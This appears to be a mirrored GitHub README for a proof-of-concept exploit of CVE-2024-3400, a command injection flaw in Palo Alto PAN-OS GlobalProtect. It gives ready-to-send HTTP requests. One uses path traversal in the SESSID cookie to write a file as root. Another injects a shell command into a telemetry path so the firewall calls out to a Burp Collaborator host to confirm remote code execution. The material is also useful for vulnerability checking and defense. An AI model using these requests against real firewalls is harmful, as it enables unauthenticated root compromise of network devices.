来源

关联漏洞

描述

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

介绍

# CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

**Vendor Description**

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.


## Exploit
Kudos for [watchtowr labs](https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/")  🚀 

### Path traversal / Check
HTTP request: 

```http

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
**poc.txt** should be created under this path `/var/appweb/sslvpndocs/global-protect/portal/images/poc.tx` with root privilege.

If vulnerable you will recieve 403 when you access *poc.txt* instead of 404.

```http

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
```

# RCE Check

Telemetry must be enabled.

You can use Burp Collaborator for rce check
```http

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```


#### References

* https://security.paloaltonetworks.com/CVE-2024-3400
* https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
* https://github.com/h4x0r-dz/CVE-2024-3400

文件快照

 [4.0K]  /data/pocs/019863a9b667f5da7a7a1b2c85670b42d4459a29
├── [ 688]  CVE-2024-3400.yaml
├── [1.0K]  LICENSE
└── [1.6K]  README.md

0 directories, 3 files

备注